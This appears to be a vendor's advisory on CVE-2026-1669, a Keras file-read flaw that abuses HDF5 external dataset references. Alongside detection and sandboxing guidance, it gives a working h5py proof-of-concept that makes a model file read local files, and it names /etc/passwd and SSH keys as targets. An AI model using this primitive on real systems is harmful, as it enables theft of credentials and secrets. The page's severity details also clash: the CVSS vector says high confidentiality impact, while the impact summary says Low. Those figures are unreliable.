CVE-2026-1669: Keras File Read Vulnerability

CVE-2026-1669 is an information disclosure vulnerability in Keras versions 3.0.0 through 3.13.1. Attackers can read local files via crafted HDF5 model files. This article covers technical details, affected versions, and mitigation.

Published: February 13, 2026

CVE-2026-1669 Overview

CVE-2026-1669 is an arbitrary file read vulnerability affecting the model loading mechanism in Keras, specifically within the HDF5 integration component. This vulnerability allows a remote attacker to read local files and disclose sensitive information by crafting a malicious .keras model file that exploits HDF5 external dataset references. The vulnerability impacts Keras versions 3.0.0 through 3.13.1 across all supported platforms.

Critical Impact

Attackers can leverage crafted model files to exfiltrate sensitive data from target systems, potentially exposing credentials, configuration files, and other confidential information through the HDF5 external reference mechanism.

Affected Products

  • Keras 3.0.0 through 3.13.1
  • All platforms supporting Keras 3.x with HDF5 integration
  • Applications loading untrusted .keras model files

Discovery Timeline

  • 2026-02-11 - CVE-2026-1669 published to NVD
  • 2026-02-12 - Last updated in NVD database

Technical Details for CVE-2026-1669

Vulnerability Analysis

This vulnerability is classified under CWE-73 (External Control of File Name or Path), which occurs when software constructs a file path using externally supplied input without proper validation. In this case, the Keras model loading mechanism fails to adequately sanitize external dataset references embedded within HDF5-formatted model files.

When Keras loads a .keras model file containing HDF5 data, it processes external dataset references that can point to arbitrary file paths on the local system. An attacker can craft a malicious model file with external references pointing to sensitive files such as /etc/passwd, configuration files, SSH keys, or application secrets. When the victim loads this model, Keras follows the external references and reads the contents of the specified files, exposing them to the attacker.

The network-based attack vector with no privilege requirements makes this particularly concerning for machine learning workflows that involve loading models from external or untrusted sources—a common practice in collaborative ML development and model sharing platforms.

Root Cause

The root cause lies in insufficient validation of HDF5 external dataset references during the model deserialization process. The HDF5 file format supports external links that can reference data stored in separate files. Keras's model loading implementation trusts these external references without verifying that they point to legitimate model data files rather than sensitive system files.

The vulnerability specifically manifests because:

  1. HDF5 external dataset references are processed without path validation
  2. No allowlist or blocklist restricts which files can be referenced
  3. The referenced file contents are read and potentially exposed during model loading operations
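The mechanism can be illustrated with h5py, the library commonly used for HDF5 I/O in Python. This is a hedged sketch of the assumed primitive (HDF5 external raw storage, where a dataset's backing bytes live in an arbitrary file on disk); the file names are illustrative stand-ins, not taken from the advisory:

```python
# Sketch (assumed mechanism): HDF5 "external" dataset storage lets a dataset's
# raw bytes live in any file on disk. File names here are illustrative only.
import h5py

# Stand-in for a sensitive file the attacker wants to read.
with open("secret.txt", "wb") as fh:
    fh.write(b"db_password=hunter2\n")

# Attacker side: declare a dataset whose backing storage is the external file.
with h5py.File("evil.h5", "w") as f:
    f.create_dataset(
        "weights", shape=(20,), dtype="uint8",
        external=[("secret.txt", 0, 20)],  # (path, offset, size in bytes)
    )

# Victim side: merely reading the dataset returns the raw bytes of secret.txt,
# with no path validation anywhere in between.
with h5py.File("evil.h5", "r") as f:
    leaked = f["weights"][:].tobytes()

print(leaked)
```

In a real attack the external path would point at a target such as /etc/passwd rather than a file the attacker created, and the payload would be packaged inside a model archive rather than a bare .h5 file.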

Attack Vector

The attack exploits the network-accessible nature of model sharing. An attacker crafts a malicious .keras model file containing HDF5 external dataset references pointing to sensitive local files on the target system. This file can be distributed through:

  • Public model repositories and sharing platforms
  • Phishing emails with attached model files
  • Compromised model hosting services
  • Supply chain attacks on ML pipelines

When a victim loads the crafted model using Keras, the HDF5 library follows the external references and reads the specified files. The attacker can then capture this information through error messages, model outputs, or by embedding exfiltration mechanisms within the model structure. This attack requires user interaction (loading the malicious model) but no authentication or privileges on the target system.

Detection Methods for CVE-2026-1669

Indicators of Compromise

  • Presence of .keras model files from untrusted or unknown sources in ML pipeline directories
  • Unexpected file read operations originating from Python processes running Keras/TensorFlow
  • HDF5 files containing external dataset references pointing to system paths like /etc/, /home/, or Windows system directories
  • Anomalous network traffic following model loading operations that may indicate data exfiltration

Detection Strategies

  • Monitor file system access patterns for Keras/TensorFlow processes attempting to read files outside expected model directories
  • Implement file integrity monitoring on sensitive configuration files to detect unauthorized read attempts
  • Analyze incoming .keras and HDF5 files for external dataset references before loading into production environments
  • Deploy application-level logging to capture model loading events and associated file operations
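The third strategy above can be sketched as a pre-load scanner that walks an HDF5 payload's metadata and flags external links or external raw storage without dereferencing either. A hedged example using h5py (the function name and rejection policy are illustrative, not part of any official tooling):

```python
# Hedged sketch of a pre-load vetting check: flag HDF5 objects that declare
# external links or external raw storage, without ever dereferencing them.
import h5py

def scan_hdf5(path: str) -> list[str]:
    """Return descriptions of objects using external links or storage."""
    findings = []

    def walk(group, prefix=""):
        for name in group:
            full = prefix + name
            link = group.get(name, getlink=True)
            if isinstance(link, h5py.ExternalLink):
                # External link to another file: report, do not follow.
                findings.append(f"{full}: external link -> {link.filename}")
                continue
            if isinstance(link, h5py.SoftLink):
                continue
            obj = group[name]
            if isinstance(obj, h5py.Dataset) and obj.external:
                # Dataset whose raw bytes live outside this file.
                findings.append(f"{full}: external raw storage {obj.external}")
            elif isinstance(obj, h5py.Group):
                walk(obj, full + "/")

    with h5py.File(path, "r") as f:
        walk(f)
    return findings

# Demo: a file declaring external raw storage should be flagged.
with h5py.File("suspect.h5", "w") as f:
    f.create_dataset("w", shape=(4,), dtype="uint8",
                     external=[("target.bin", 0, 4)])
print(scan_hdf5("suspect.h5"))
```

Keras 3 .keras files are zip archives; a production vetting step would apply a check like this to any embedded .h5 members before handing the archive to the model loader.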

Monitoring Recommendations

  • Configure endpoint detection to alert on Python processes accessing sensitive system files during ML operations
  • Implement network segmentation to limit outbound connectivity from ML processing environments
  • Enable audit logging for file read operations in directories containing sensitive data
  • Deploy SentinelOne Singularity to detect and prevent unauthorized file access patterns associated with this vulnerability class
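On Linux hosts, the audit-logging recommendation above can be approximated with auditd watch rules on specific sensitive files. A hedged example; the paths and key label are illustrative and would need tailoring to your environment:

```shell
# Illustrative auditd rules: log read access to sensitive files so that a
# model-loading process touching them leaves an audit trail. Requires root.
auditctl -w /etc/passwd -p r -k ml-sensitive-read
auditctl -w /root/.ssh/ -p r -k ml-sensitive-read

# Review recent hits tagged with the key above.
ausearch -k ml-sensitive-read --start recent
```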

How to Mitigate CVE-2026-1669

Immediate Actions Required

  • Update Keras to a patched version beyond 3.13.1 when available
  • Audit all existing .keras model files in your environment for external dataset references
  • Implement strict controls on model file sources, accepting only models from trusted and verified origins
  • Isolate ML model loading operations in sandboxed environments with restricted file system access
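A quick first step is confirming whether the installed Keras falls inside the affected 3.0.0 through 3.13.1 range. A stdlib-only sketch with deliberately naive version parsing (no pre-release handling; use your packaging tooling for anything authoritative):

```python
# Hedged helper: flag Keras versions in the affected 3.0.0 through 3.13.1 range.
from importlib.metadata import PackageNotFoundError, version

def parse_version(v: str) -> tuple:
    """Naive parse: leading numeric components only, no pre-release handling."""
    parts = []
    for piece in v.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)

def is_affected(v: str) -> bool:
    return (3, 0, 0) <= parse_version(v) <= (3, 13, 1)

try:
    installed = version("keras")
    print(f"keras {installed} affected: {is_affected(installed)}")
except PackageNotFoundError:
    print("keras not installed")
```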

Patch Information

Refer to the GitHub Security Advisories for official patch information and updated Keras releases addressing this vulnerability. Organizations should monitor the Keras project's security announcements for remediation guidance.

Workarounds

  • Validate and sanitize all .keras model files before loading by inspecting HDF5 structures for external references
  • Run model loading operations in containerized environments with minimal file system access and no access to sensitive files
  • Implement a model vetting process that scans incoming models for potentially malicious external references before deployment
  • Use file system access controls to prevent Keras processes from reading files outside designated model directories
```bash
# Example: restrict file access for ML processes using container isolation.
# Run Keras model loading in a restricted container with a read-only root
# filesystem and only a trusted model directory mounted.
docker run --rm \
  --read-only \
  --tmpfs /tmp \
  -v /path/to/trusted/models:/models:ro \
  --security-opt no-new-privileges \
  keras-sandbox python load_model.py /models/model.keras
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Vulnerability Details

  • Type: Information Disclosure
  • Vendor/Tech: Keras
  • Severity: HIGH
  • CVSS Score: 7.1
  • EPSS Probability: 0.10%
  • Known Exploited: No
  • CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Impact Assessment

  • Confidentiality: Low
  • Integrity: Low
  • Availability: None

CWE References

  • CWE-73

Technical References

  • GitHub Security Advisories

Related CVEs

  • CVE-2026-1462: Keras Package RCE Vulnerability
  • CVE-2025-49655: Keras Framework RCE Vulnerability
  • CVE-2024-3660: Keras Framework RCE Vulnerability
  • CVE-2024-55459: Keras RCE Vulnerability